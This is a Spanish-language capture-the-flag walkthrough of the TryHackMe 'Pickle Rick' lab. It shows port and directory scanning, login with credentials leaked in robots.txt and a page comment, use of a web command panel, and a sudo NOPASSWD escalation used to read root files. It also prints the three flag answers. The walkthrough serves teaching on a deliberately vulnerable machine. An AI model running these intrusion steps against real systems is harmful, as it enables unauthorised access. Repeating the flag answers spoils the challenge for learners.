[TRYHACKME] Pickle Rick 

Hoy vamos a hackear la maquina de TryHackMe llamada
PickleRick.Podeis descargarla desde el siguiente enlace: 
https://tryhackme.com/room/picklerick


  • Video
    • 



  • Enumeration
    • 
Empezamos con un nmap para ver que puertos 
tiene abiertos.


    
~ > nmap -A -p- 10.10.61.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 04:31 CEST
Nmap scan report for 10.10.61.13
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 8a:b4:b0:1f:2d:08:1d:d1:52:2c:4a:ee:88:2c:d5:92 (RSA)
|   256 36:14:22:35:a2:a8:80:b3:1d:6d:55:99:e3:fa:2a:f6 (ECDSA)
|_  256 94:e7:79:5d:6e:69:e8:32:0b:cd:94:d0:0d:67:d3:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.59 seconds

    

Exploramos un poco mas el puerto 80 para ver si encontramos algo
interesante.


    
~ > gobuster dir -u http://10.10.61.13 -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.61.13
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/08/08 04:34:43 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/assets (Status: 301)
/denied.php (Status: 302)
/index.html (Status: 200)
/login.php (Status: 200)
/portal.php (Status: 302)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/08/08 04:35:30 Finished
===============================================================

    

Encontramos login.php y portal.php, los cuales nos piden credenciales
para entrar.

En http://10.10.61.13/robots.txt vemos:
Wubbalubbadubdub

Y por otro lado, en el codigo fuente de la pagina inicial
podemos ver que hay comentado lo siguiente:


    
Note to self, remember username!
Username: R1ckRul3s

    

Con los datos obtenidos, accedemos a login.php
y metemos los credenciales:


    
R1ckRul3s/Wubbalubbadubdub

    

En el command Panel hacemos un "ls" y vemos que hay un fichero:


    
Sup3rS3cretPickl3Ingred.txt

    


  • 1 Ingrediente
    • 
Al tratar de usar "cat" nos da problemas, asi que usamos
el comando "less" para ver el contenido de los ficheros.


    
less Sup3rS3cretPickl3Ingred.txt

    

Al ejecutarlo nos devuelve el primer
ingrediente:


    
mr. meeseek hair

    


  • 2 Ingrediente
    • 
Tras buscar, podemos ver que el segundo ingrediente
se encuentra en /home/rick, para ver el ingrediente
ejecutamos:


    
less /home/rick/"second ingredients"
1 jerry tear

    


  • 3 Ingrediente
    • 
Por ultimo, y para encontrar el 3 y ultimo ingrediente, suponemos
que esta en la carpeta root, con lo cual necesitaremos permisos
para verla.

Si en la web ejecutamos el comando:


    
sudo - l

    

Nos devuelve:


    
Matching Defaults entries for www-data on 
ip-10-10-61-13.eu-west-1.compute.internal:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User www-data may run the following commands on 
ip-10-10-61-13.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

    

Bien, podemos usar sudo para ver el contenido de los ficheros del sistema
y tendremos permisos de root.
Miramos el contenido del directorio de root:


    
sudo ls -a /root
---SNIP---
3rd.txt
---SNIP---

    

Vemos que esta el fichero 3rd.txt.
Vamos a ver su contenido :)


    
sudo less /root/3rd.txt
3rd ingredients: fleeb juice

    

Con esto ya tendriamos todos los ingredientes :)